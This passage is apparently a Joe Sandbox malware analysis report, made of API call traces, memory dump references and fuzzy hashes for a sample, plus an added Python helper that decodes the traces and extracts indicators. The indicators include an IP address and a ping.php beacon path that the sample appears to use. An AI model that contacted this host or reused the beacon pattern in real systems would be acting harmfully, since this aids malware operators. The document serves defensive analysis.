• WriteFile.KERNEL32(00000000,?,?,00002000,00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042624A
• FindCloseChangeNotification.KERNEL32(00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426253
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: File$ChangeCloseCreateFindNotificationWrite
• String ID:
• API String ID: 3805958096-0
• Opcode ID: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
• Instruction ID: 926e9ac1e5f1aba45008a0d26bda579428ca80e0843417663d772dc166ed892d
• Opcode Fuzzy Hash: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
• Instruction Fuzzy Hash: 73E06572701120BBD7351B99AC48FABBE6DEF856F0F050169FB01E21109A61DC0197B4
Uniqueness
• Uniqueness Score: -1.00%
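A triage helper, added here as an example and not part of the Joe Sandbox report or the sample's code: it parses API lines in the format used above (the three lines from the function at 0x426217 are embedded as sample input), decodes the CreateFileA parameters from the documented Win32 constants, and pulls the network indicators out of the stack slots. It assumes, as an interpretation of the report format, that each line lists raw stack slots at the call site, so slots beyond an API's declared parameter count (7 for CreateFileA, 5 for WriteFile, 1 for FindCloseChangeNotification) are leftover caller-frame values rather than arguments; on that reading the IP and the URL format string are visible on the WriteFile line because the caller had them on its stack, not because WriteFile wrote them.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: the three API lines from the report's function at 0x426217.
SAMPLE_APIS = """\
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,00002000,00000000,?,?,0042588E,00000001,?,00002000), ref: 00426232
• WriteFile.KERNEL32(00000000,?,?,00002000,00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042624A
• FindCloseChangeNotification.KERNEL32(00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426253
"""

# One report line: "<api>.<module>(<slot>,<slot>,...), ref: <hex address>"
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Declared parameter counts (assumption: slots past this count are caller-frame residue).
PARAM_COUNT = {"CreateFileA": 7, "WriteFile": 5, "FindCloseChangeNotification": 1}

# Win32 constants from the CreateFile documentation.
ACCESS_BITS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
               0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_BITS = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
URL_PATH_RE = re.compile(r"^/[\w./?=&%-]+$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]      # declared parameters, as hex text or "?" when unknown
    residue: List[str]   # remaining stack slots beyond the parameter count
    ref: int             # call-site address


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report API lines; lines that do not match the pattern are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        slots = [s.strip() for s in m.group("args").split(",")]
        n = PARAM_COUNT.get(m.group("api"), len(slots))
        calls.append(ApiCall(m.group("api"), m.group("mod"), slots[:n], slots[n:],
                             int(m.group("ref"), 16)))
    return calls


def _hex(slot: str) -> Optional[int]:
    return None if slot == "?" else int(slot, 16)


def _bits(value: int, table: Dict[int, str]) -> List[str]:
    return [name for bit, name in table.items() if value & bit] or ["none"]


def decode_createfile(call: ApiCall) -> Dict[str, object]:
    """Decode dwDesiredAccess, dwShareMode, dwCreationDisposition, dwFlagsAndAttributes."""
    assert call.api == "CreateFileA"
    access, share = _hex(call.args[1]), _hex(call.args[2])
    disp, flags = _hex(call.args[4]), _hex(call.args[5])
    return {
        "access": _bits(access, ACCESS_BITS) if access is not None else ["?"],
        "share": _bits(share, SHARE_BITS) if share is not None else ["?"],
        "disposition": DISPOSITION.get(disp, hex(disp)) if disp is not None else "?",
        "attributes": ("FILE_ATTRIBUTE_NORMAL" if flags == 0x80
                       else hex(flags) if flags is not None else "?"),
    }


def extract_indicators(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Collect IPv4 addresses and URL paths from every slot, arguments and residue alike."""
    ips, paths = set(), set()
    for c in calls:
        for slot in c.args + c.residue:
            if IPV4_RE.match(slot):
                ips.add(slot)
            elif URL_PATH_RE.match(slot):
                paths.add(slot)
    return {"ips": sorted(ips), "paths": sorted(paths)}


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_APIS)
    print(decode_createfile(calls[0]))
    print("WriteFile size:", int(calls[1].args[3], 16), "bytes")
    print(extract_indicators(calls))
```

For the lines above this decodes to GENERIC_WRITE, no sharing, OPEN_ALWAYS and FILE_ATTRIBUTE_NORMAL, with a 0x2000-byte WriteFile, i.e. a small file-drop stub; the IP and the ping.php format string are the indicators worth blocking or hunting on, with the caveat that their exact role (beacon URL versus static config) is not established by this function alone.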

Control-flow Graph
control_flow_graph 1705 401bb2-401c21 call 4275a4 call 40307c call 402fe5 call 402f6b 1714 401c51-401c61 1705->1714 1715 401c23-401c47 1705->1715 1715->1714 1716 401c49-401c4c call 40187f 1715->1716 1716->1714
APIs
• __EH_prolog.LIBCMT ref: 00401BB7
  • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
  • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
  • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
  • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
  • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
  • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
• String ID: v*@
• API String ID: 3966877926-3062513736
• Opcode ID: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
• Instruction ID: b9e6d0c04dc114dbe46ca1cb3692bd7dbb1da951860286197dc681cf7a8c4379
• Opcode Fuzzy Hash: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
• Instruction Fuzzy Hash: E82190B1711206AFD708DF59C889A6AF7F9FF48348F14826EE115A7341C7B8DE008B94
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
• __EH_prolog.LIBCMT ref: 00425EE7
  • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
  • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: H_prolog$Ios_base_dtorstd::ios_base::_
• String ID:
• API String ID: 420165198-0
• Opcode ID: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
                                                                                                                                                                                                                                  • Instruction ID: 8b308e217030a11e536693c7e770bb36c60ea871e1947f1e620e0115d8c257f2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B311570D01119EBDB14EF95E985AEDFBB4BF48304F1080AEE805B3681EB786A04CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 1742 418ccd6-418ccef 1743 418ccf1-418ccf3 1742->1743 1744 418ccfa-418cd06 CreateToolhelp32Snapshot 1743->1744 1745 418ccf5 1743->1745 1746 418cd08-418cd0e 1744->1746 1747 418cd16-418cd23 Module32First 1744->1747 1745->1744 1746->1747 1752 418cd10-418cd14 1746->1752 1748 418cd2c-418cd34 1747->1748 1749 418cd25-418cd26 call 418c995 1747->1749 1753 418cd2b 1749->1753 1752->1743 1752->1747 1753->1748
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0418CCFE
• Module32First.KERNEL32(00000000,00000224), ref: 0418CD1E
Memory Dump Source
• Source File: 00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0418C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_418c000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: f6c31ff947f6c792c9c87fdfc8291577f8ad4f585aa1ba31af4ecc7210931973
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: CFF068315007156BD7203BB598CCB6AB6E9EF89765F10066DE643910C0EB70F8464AB1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 1755 5ce0e0f-5ce0e24 SetErrorMode * 2 1756 5ce0e2b-5ce0e2c 1755->1756 1757 5ce0e26 1755->1757 1757->1756
APIs
• SetErrorMode.KERNEL32(00000400,?,?,05CE0223,?,?), ref: 05CE0E19
• SetErrorMode.KERNEL32(00000000,?,?,05CE0223,?,?), ref: 05CE0E1E
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: 034f719d583cdcf149d4b4900ed08659f687a8774513151b422f5fbf69caf0e9
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: CBD0123114512877D7002A94DC0DBCD7B1CDF05B62F008421FB0DE9080C7B0964046E5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
• Instruction ID: d77f3fb4a2dea80d7e26f58f35abdac3f7963be9eaf0666b1d936bf3e200b83d
• Opcode Fuzzy Hash: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
• Instruction Fuzzy Hash: 11510771A00108AFDB10DF29C840BFA7BA1EF85364F19815EE8489B392CB39DD82C759
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
• Opcode ID: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
• Instruction ID: 0bde1253143090ae73d8540e9fd285f072e0ff93183f3a7406587cf81db67a05
• Opcode Fuzzy Hash: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
• Instruction Fuzzy Hash: CF316B31604706AFC710DE29C884A5ABBA0BF88354F04863EF954A73A1D779D854CB9A
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004024A6
  • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
  • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: Exception@8H_prologThrowstd::system_error::system_error
• String ID:
• API String ID: 938716162-0
• Opcode ID: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
• Instruction ID: 51a424f7f6e89c6a531f911fc24cb136489b0386115aa572e9e255c0d5409117
• Opcode Fuzzy Hash: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
• Instruction Fuzzy Hash: B9318B71A00505AFCB18DF69C9D5E6AB7F5FF84318718C16EE416AB791C634EC40CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00402581
  • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
• Instruction ID: 5794e906f2440793f0f111a630642e31dc7bb6ced8b38f44c89e924cf631a0c7
• Opcode Fuzzy Hash: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
• Instruction Fuzzy Hash: 87318770A00615AFCB15DF09CA84A9ABBB1FF48314F14856EE405AB791C7B9ED40CB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                    • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                                                                                                                  • Opcode ID: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
                                                                                                                                                                                                                                  • Instruction ID: 4e0495d31301cfc09fe992fc8428b3d42591f74c8e771436201b91ad316d0700
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D217C70601611DFC728DF19C54896ABBF5FF88314B20C26DE85A9B7A1C774AE41CB90
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __wsopen_s
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3347428461-0
                                                                                                                                                                                                                                  • Opcode ID: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                  • Instruction ID: 62b4485d732ad4ebc0017ff3881fb56af0f069673ee8f9cf524c42d6b5156d4d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6911367590410AAFCB05DF98E9419EB7BF4EF48314F0040AAF819AB311D631E9618BA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
                                                                                                                                                                                                                                  • Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6507e6dca9fd37c1152104383e81a26a388e7b6248357c92fed83c7c77d0c48c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                    • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3585332825-0
                                                                                                                                                                                                                                  • Opcode ID: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
                                                                                                                                                                                                                                  • Instruction ID: 4123f54f6db546b52d5441bf0cc69889d4086bdab9222fcc4d2dc13d92cadc12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 275b497e8b0ccd48a1c91312fae6d11bbe173a5bd3edbee57c471b6d182478c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32018F70610114AFDB14DB65CA0ABAEB3F9AF44708F00403EF405B76D1DBF8AE408B58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                  • Instruction ID: b492b302e4735b3d70b5ef79ffcf6f17a9fdb10017537b69176e17197afc0c8a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7ba057ced36894faabbf0cfef253f3c85e20b59e21e5f6d36d312241c511836
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DF09A3251111CBBCF015E96DC01DDA3B6EEF89324F100256FD2492050DA3ACA61ABA5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction ID: dd4a480e522f73ad3d9a6edd52b828d095e0909c103fd04d4038ae70eb088b48
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35E0A03128822557972026629C00BDF6A69AF417E0B150223BC0496290CA5C8BD182AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: Exception@8Throw
• String ID:
• API String ID: 2005118841-0
• Opcode ID: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
• Instruction ID: da63f0164d942bc1a0aafd7abbbc04ca9aad8e839738e50b0fb3006ae61beab9
• Opcode Fuzzy Hash: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
• Instruction Fuzzy Hash: E9E0923440430EB6CF047A66D9169AA372C1E00324F20897FB818B55E2EB78DDA6C59E
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
• Instruction ID: d84f72958a1ce38eec5c6f13dd7d1e1a4f86a781eb43601fc0a5ec169b289762
• Opcode Fuzzy Hash: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
• Instruction Fuzzy Hash: B2D06C3210010DBBDF129F84DC06EDA7BAAFB48754F018010BA5856060C732E872AB94
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0418C9E6
Memory Dump Source
• Source File: 00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0418C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_418c000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 0d382c4450acd8a3aa4ed15817e8918ded74399c3e90674305abfa72b9f5e43a
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 6C113C79A00208EFDB01DF98C985E98BBF5AF08350F058094F9489B361E371EA50DF90
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
  • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
  • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
  • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
  • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
  • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00420AA7
• IsValidCodePage.KERNEL32(00000000), ref: 00420B02
• IsValidLocale.KERNEL32(?,00000001), ref: 00420B11
• GetLocaleInfoW.KERNEL32(?,00001001,=CA,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420B59
• GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 00420B78
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID: 0B$=CA$=CA$=CA
• API String ID: 745075371-1249640317
